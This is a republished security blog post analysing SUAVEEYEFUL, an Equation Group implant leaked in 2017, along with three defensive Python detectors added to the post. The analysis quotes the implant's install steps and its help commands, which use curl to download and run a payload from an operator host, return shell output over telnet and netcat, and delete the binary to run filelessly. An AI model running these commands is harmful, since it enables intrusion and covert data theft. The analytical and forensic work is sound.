The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP

2022-6-22 15:19:17 Author: xorl.wordpress.com

I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what this software implant does and how it works. This was in a directory titled suaveeyeful_i386-unknown-mirapoint3.4.3 and it reveals lots of interesting details. In summary:

  • SUAVEEYEFUL is a CGI software implant for FreeBSD and Linux
  • SUAVEEYEFUL was used to spy on the email traffic of the Chinese MFA and the Japanese Waseda Research University at least since the early 2000s
  • The leaked file/operation was targeting MiraPoint email products
  • SUAVEEYEFUL had some innovative, for its time, TTPs like data encryption and fileless malware

The Leaked Files

In that directory there are a few different files. Those are:

  • bdes: A copy of the FreeBSD bdes (tool to encrypt/decrypt using DES) command line utility, based on the FreeBSD bdes version 1.3.2.1 (from 22 Sep. 2000), but compiled on Linux in 2003.
  • decode-base64: Simple Perl decoding script using MIME::Base64.
  • implant: ELF binary software implant component of SUAVEEYEFUL, built for i386 on FreeBSD version 4.3 (this version was released in April 2001).
  • implant.mg1.waseda.ac.jp: ELF binary software implant component of SUAVEEYEFUL used against the Japanese Waseda Research University’s email gateway (variant of the implant file).
  • opscript.se: The commands to execute in order to install the SUAVEEYEFUL (abbreviated as SE) software implant in the Japanese Waseda Research University.
  • se: The client component of the SUAVEEYEFUL software implant, written in Bash. This copy has hardcoded targets for the Japanese Waseda Research University.
  • se.old: Previous version of the SUAVEEYEFUL software implant client, written in Bash. This copy has a hardcoded target for the Chinese Ministry of Foreign Affairs email gateway.

The utilities (bdes, decode-base64 and uriescape) were bundled along with SUAVEEYEFUL because they are used internally. This ensured that the software implant would not rely on any external dependencies (other than the core system utilities that were standard at the time, such as ls, cat, telnet, etc.).

List of the files leaked by the Shadow Brokers under the suaveeyeful_i386-unknown-mirapoint3.4.3 directory

Targets

The se.old client was potentially the one the operators were adapting for their new target, given inconsistencies in its content which make it look like a draft/edited version of an old operation. A leftover comment identifies mail.mfa.gov.cn (202.99.26.6) as its configured SUAVEEYEFUL target.

This was the email gateway of the Chinese Ministry of Foreign Affairs (MFA). Even today, this IP address (202.99.26.6) still points to an email server of China’s MFA. It’s hard to determine when the EQUATION GROUP compromised this email server using the SUAVEEYEFUL software implant. Based entirely on the build times, we can assess that it was at least since the early 2000s.

The current website hosted on mail.mfa.gov.cn

Most of the files included in the leaked directory were designed for another target: the email gateways of Waseda Research University, which, according to its official website, “strives to conduct cutting-edge research that solves world problems and contributes to the greater good of society. Unorthodox thinking and intellectual curiosity are what drive research at Waseda.”

The se client had two compromised Waseda email gateways configured, both accessed via their internal IP addresses from another compromised host that is referenced only by its IP address. So, at least 3 systems in Waseda’s infrastructure were compromised by the EQUATION GROUP since at least 2003.

  • mp450 (10.1.2.208)
  • mg1.waseda.ac.jp (10.9.4.15)
  • 10.1.2.150 – another compromised host

The first host (mp450) was the university’s MiraPoint 450 (later renamed to RazorGate 450), an email security appliance, and the second host (mg1.waseda.ac.jp) was the MiraPoint email gateway. The third host is still unknown, but based on its IP range (similar to that of mp450) we can deduce that it was likely a system located in the university’s DMZ network segment.

Simplified visualisation of the SUAVEEYEFUL installation process

Installation of SUAVEEYEFUL in Waseda’s MiraPoint Servers

This is clearly described in the opscript.se file, which we can assume was one of the first operational tasks that the EQUATION GROUP operators executed to install the SUAVEEYEFUL software implant. Here is that process:

  1. Copy the implant to /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi
  2. Change nph-help.cgi’s file permissions to 555
  3. Change nph-help.cgi’s ownership to “root” with group “nobody”
  4. Use touch -r so that nph-help.cgi, and everything under the /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/ directory, carries the same timestamps as the legitimate /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/publish.html file of the MiraPoint web service
  5. Use netcat to start a listener on port 4444, decoding the received data with Base64 and decrypting it using bdes with a hardcoded key (0x4790cae5ec154ccc in this case)
  6. Connect back from mp450’s SUAVEEYEFUL implant to the listening port 4444 and return some basic system information (who is logged in, file/directory listings, etc.)
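Step 4 is the part an investigator can turn against the installer. touch -r copies atime and mtime from the reference file, but ctime (inode change time) is written by the kernel and cannot be cloned, so a file whose mtime is bit-for-bit identical to publish.html’s while its ctime is years later is a strong timestomping indicator, and an executable in a help/locale directory that should only hold HTML is another. The following check is an added example written for this post, not part of the leaked toolkit or of the original write-up; the directory it scans is constructed in a temp directory (so publish.html’s own ctime is “now” and the scanner skips the reference file explicitly), and the 24-hour ctime gap is an assumed threshold. On a real host you would point scan_help_directory() at the utilities directory with publish.html as the reference.

```python
import os
import shutil
import stat
import tempfile
import time

# Added example for this write-up (not from the leaked toolkit or the post):
# a forensic check for the `touch -r` timestamp-cloning step. touch copies
# atime and mtime from the reference file, but ctime is written by the kernel
# and cannot be cloned, so a file whose mtime is identical to the reference's
# while its ctime is much later was most likely timestomped.

CTIME_GAP_SECONDS = 24 * 3600  # assumed threshold between cloned mtime and ctime


def scan_help_directory(directory, reference, gap=CTIME_GAP_SECONDS):
    """Return [(name, [reasons])] for regular files in `directory` that look
    planted: mtime cloned from `reference` with a much later ctime, and/or an
    executable bit in a directory that should only hold help pages."""
    ref = os.stat(reference)
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode) or os.path.samefile(path, reference):
            continue  # skip symlinks, subdirectories and the reference itself
        reasons = []
        if st.st_mtime_ns == ref.st_mtime_ns and st.st_ctime - st.st_mtime > gap:
            reasons.append("mtime identical to reference, ctime %.0f days later"
                           % ((st.st_ctime - st.st_mtime) / 86400))
        if st.st_mode & 0o111:
            reasons.append("executable (mode %o) in a help/locale directory"
                           % (st.st_mode & 0o777))
        if reasons:
            findings.append((name, reasons))
    return findings


def build_demo_tree():
    """Construct a sample utilities/ directory: a legitimate publish.html dated
    to the FreeBSD 4.3 era and a planted nph-help.cgi with cloned timestamps."""
    root = tempfile.mkdtemp(prefix="se-demo-")
    legit = os.path.join(root, "publish.html")
    with open(legit, "w") as f:
        f.write("<html>MiraPoint help (constructed sample)</html>\n")
    old = time.mktime((2001, 4, 20, 12, 0, 0, 0, 0, -1))
    os.utime(legit, (old, old))
    planted = os.path.join(root, "nph-help.cgi")
    with open(planted, "w") as f:
        f.write("#!/bin/sh\n# placeholder standing in for the implant binary\n")
    os.chmod(planted, 0o555)  # step 2 of opscript.se
    # emulate `touch -r publish.html nph-help.cgi`: only atime/mtime are copied
    ref = os.stat(legit)
    os.utime(planted, ns=(ref.st_atime_ns, ref.st_mtime_ns))
    return root


def run_demo():
    """Build the sample tree, scan it and clean up; returns the findings."""
    root = build_demo_tree()
    try:
        return scan_help_directory(root, os.path.join(root, "publish.html"))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for name, reasons in run_demo():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

The ctime comparison is the part worth remembering: no userland tool can set ctime through the normal API, so an attacker who clones mtime with touch -r still leaves a gap between the two that a plain ls -l never shows but stat does.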

The SUAVEEYEFUL Software Implant

SUAVEEYEFUL (or SE) has two components, the client and the server. The server component is a very simple CGI program written in C for FreeBSD that reads its input from its help endpoint. Any command received is executed (with root privileges, as shown in the previous section) using the system() library call, as long as it matches the defined format (described later in this post).

The client side ensures that all requests are properly formatted, encoded (using Base64) and encrypted (with DES). The client supported 4 options:

  • -h: Display help message
  • -c: Execute command
  • -i: Input target (e.g. the URL of a host running the SE server component)
  • -k: Key used for DES encryption

Screenshot of the se client used to target the Waseda University

As we can see from this, for the generation of the cryptographic material, EQUATION GROUP was using the system’s /dev/random in the following way:

head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'

The command was then structured with # being used as a separator. The main command to be executed was constructed with this:

echo "`head -c 8 /dev/random | hexdump -e '/8 "%016x\n"'`#`date +"%s"`#$cmd"|bdes -k $key > out

This produces a plaintext of the form random-nonce#unix-timestamp#command:

This structure was then encrypted using the hardcoded DES key and passed through the uriescape tool to ensure that there would be no parsing issues on the receiving MiraPoint web server.

Apart from the above, the client also used the date +"%N" command to get the current time in nanoseconds and encrypt it with a key matching the same value. This was an anti-analysis/anti-detection trick, since it would be hard for anyone to get the SE software implant to execute any command without this non-intuitive addition to its expected input.
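To make the message structure concrete, here is a parser for the plaintext the se client assembles before DES-encrypting it, written from the analyst’s side (for validating messages recovered from a decrypted capture). It is an added example, not the leaked client or server code. It handles the one edge case a naive split would get wrong, a shell command that itself contains #, and shows why the two prefixes matter: the timestamp gives a freshness check and the random 8 bytes make an exact replay of an earlier message distinguishable from a fresh one. The nonce pattern (lowercase hex, as hexdump %016x prints it), the 300-second freshness window and the replay tracker are my assumptions; the post does not say whether the server checked either prefix.

```python
import re
import time

# Added example, not the leaked client or server code: a parser for the
# plaintext the se client assembles before DES-encrypting it,
#     <8 random bytes as 16 hex digits>#<Unix timestamp>#<command>
# written from the analyst's side to validate messages recovered from a
# decrypted capture. The nonce pattern, the freshness window and the replay
# tracker are assumptions; the post does not say whether the server checked
# either prefix.

NONCE_RE = re.compile(r"^[0-9a-f]{16}$")  # hexdump %016x of 8 bytes
MAX_SKEW_SECONDS = 300  # assumed freshness window, not a value from the post


class MalformedMessage(ValueError):
    """Raised when a plaintext does not follow the nonce#timestamp#command form."""


def parse_se_message(plaintext, now=None, max_skew=MAX_SKEW_SECONDS):
    """Split a plaintext into its three fields and judge its freshness.

    Only the first two '#' are separators: the command is shell text and may
    itself contain '#', so a plain split('#') would corrupt it.
    """
    parts = plaintext.rstrip("\n").split("#", 2)
    if len(parts) != 3:
        raise MalformedMessage("expected nonce#timestamp#command, got %r" % plaintext)
    nonce, ts_text, command = parts
    if not NONCE_RE.match(nonce):
        raise MalformedMessage("nonce is not 16 hex digits: %r" % nonce)
    if not ts_text.isdigit():
        raise MalformedMessage("timestamp is not an integer: %r" % ts_text)
    timestamp = int(ts_text)
    now = int(time.time()) if now is None else now
    return {
        "nonce": nonce,
        "timestamp": timestamp,
        "command": command,
        "fresh": abs(now - timestamp) <= max_skew,
    }


def is_well_formed(plaintext):
    """True if the plaintext parses, regardless of freshness."""
    try:
        parse_se_message(plaintext, now=0, max_skew=0)
        return True
    except MalformedMessage:
        return False


class ReplayTracker:
    """Remember nonces already seen; the random prefix makes an exact replay
    of an earlier message detectable even while its timestamp is still fresh."""

    def __init__(self):
        self._seen = set()

    def accept(self, message):
        """Return True the first time a nonce is seen, False on a replay."""
        if message["nonce"] in self._seen:
            return False
        self._seen.add(message["nonce"])
        return True


if __name__ == "__main__":
    # constructed sample: the third help command as the client would wrap it
    # (the nonce and the timestamp are made up)
    sample = "0123456789abcdef#1057000000#(w; ls -l; ls -l /tmp) | telnet 10.1.2.150 4444"
    msg = parse_se_message(sample, now=1057000042)
    tracker = ReplayTracker()
    print(msg)
    print("first seen:", tracker.accept(msg), "replayed:", tracker.accept(msg))
```

Splitting with a maximum of two separators is the detail to keep: shell commands sent through this channel routinely contain # (comments, URL fragments), and a parser that split on every # would silently truncate them.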

The generation of the three values and sending the full command message to the compromised system running the SUAVEEYEFUL software implant server component

Lastly, the SE help message listed three example commands that an operator could use. They performed the following tasks:

  1. Install a fileless malware by doing the following:
    • Create a hidden directory (/tmp/.scsi)
    • Use curl to download a binary deceptively named sendmail from the operational host (10.1.2.150:5555/sendmail)
    • Run sendmail as root and connect back to the operational host on a different port (10.1.2.150:9999)
    • Remove the sendmail binary file so that it’s running only in memory, not from the filesystem
  2. Execute commands with a connect-back method:
    • Run w followed by ls -l and ls -l /tmp to get the logged-in users and the contents of the current and /tmp directories
    • Encrypt and encode the output
    • Send it to the operational host on its listening port (10.1.2.150:4444)
    • The message also guides the operator on how to generate a new DES encryption key
  3. Same as #2 but without the Base64 encoding and DES encryption

Here is the full help message:

1) se -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/curl http://10.1.2.150:5555/sendmail -osendmail;chmod +x sendmail;D=-c10.1.2.150:9999 PATH=. /usr/bin/asroot sendmail;rm -f sendmail) > /dev/null 2>&1" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 

2) se -c"(w; ls -l; ls -l /tmp) | bdes -k SECRET | mmencode | telnet 10.1.2.150 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444 | decode-base64 | bdes -d -k SECRET

Use this to generate a random key and replace SECRET with the key
  head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'

3) se -c"(w; ls -l; ls -l /tmp) | telnet 10.1.2.150 4444"  -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help" 
  with nc -l -p 4444

WARNING
WARNING

DO NOT -burn!!!
Use -exit
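The fileless trick in the first help command (run the downloaded binary, then rm -f it) leaves a process whose backing file no longer exists, and that is exactly what a host-based check can look for. The detector below is an added example, not from the post or the leaked toolkit; it assumes a Linux procfs, where the exe link of a process whose binary was unlinked reads as “<path> (deleted)” (FreeBSD does not expose this through /proc by default, so a different data source is needed there). The proc tree it scans is constructed in a temp directory so the check runs without root or an infected host; on a live Linux system you would call find_suspicious_processes("/proc"). The hidden-directory prefixes are an assumption generalising the /tmp/.scsi path from the help text.

```python
import os
import shutil
import tempfile

# Added example, not from the post or the leaked toolkit: a detector for the
# fileless step of help command #1 (run the downloaded binary, then rm -f it).
# It assumes a Linux procfs, where an unlinked executable of a live process
# shows up as "<path> (deleted)" in /proc/<pid>/exe. The proc tree below is
# constructed in a temp directory so the check runs without root or a real
# host; on a live Linux system call find_suspicious_processes("/proc").

HIDDEN_TMP_PREFIXES = ("/tmp/.", "/var/tmp/.")  # assumed; covers /tmp/.scsi


def find_suspicious_processes(proc_root="/proc"):
    """Return [(pid, exe_target, [reasons])] for processes whose binary was
    deleted while running or lives under a hidden temp directory."""
    findings = []
    pids = sorted(int(e) for e in os.listdir(proc_root) if e.isdigit())
    for pid in pids:  # self, sys, meminfo, ... are not processes and are skipped
        try:
            target = os.readlink(os.path.join(proc_root, str(pid), "exe"))
        except OSError:
            continue  # kernel threads, or processes we are not allowed to inspect
        reasons = []
        if target.endswith(" (deleted)"):
            reasons.append("executable unlinked while the process is running")
        if target.startswith(HIDDEN_TMP_PREFIXES):
            reasons.append("executable under a hidden temp directory")
        if reasons:
            findings.append((pid, target, reasons))
    return findings


def build_demo_proc():
    """Construct a fake /proc: init, a normal daemon, and a process whose
    binary was removed from /tmp/.scsi after it started."""
    root = tempfile.mkdtemp(prefix="fake-proc-")
    for pid, exe in ((1, "/sbin/init"), (812, "/usr/sbin/sshd"),
                     (4242, "/tmp/.scsi/sendmail (deleted)")):
        os.makedirs(os.path.join(root, str(pid)))
        # a dangling symlink is what the kernel presents for an unlinked binary
        os.symlink(exe, os.path.join(root, str(pid), "exe"))
    os.makedirs(os.path.join(root, "self"))  # non-numeric entries must be ignored
    return root


def run_demo():
    """Build the sample proc tree, scan it and clean up; returns the findings."""
    root = build_demo_proc()
    try:
        return find_suspicious_processes(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for pid, target, reasons in run_demo():
        print("pid %d -> %s" % (pid, target))
        for reason in reasons:
            print("  -", reason)
```

Deleting the binary hides it from the filesystem and from a later disk image, but not from the running kernel: the inode stays referenced until the process exits, and on Linux /proc/<pid>/exe can still be read (and even copied out) for as long as it runs, which is why memory and procfs collection should precede any cleanup during incident response.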

From: https://xorl.wordpress.com/2022/06/22/the-forgotten-suaveeyeful-freebsd-software-implant-of-the-equation-group/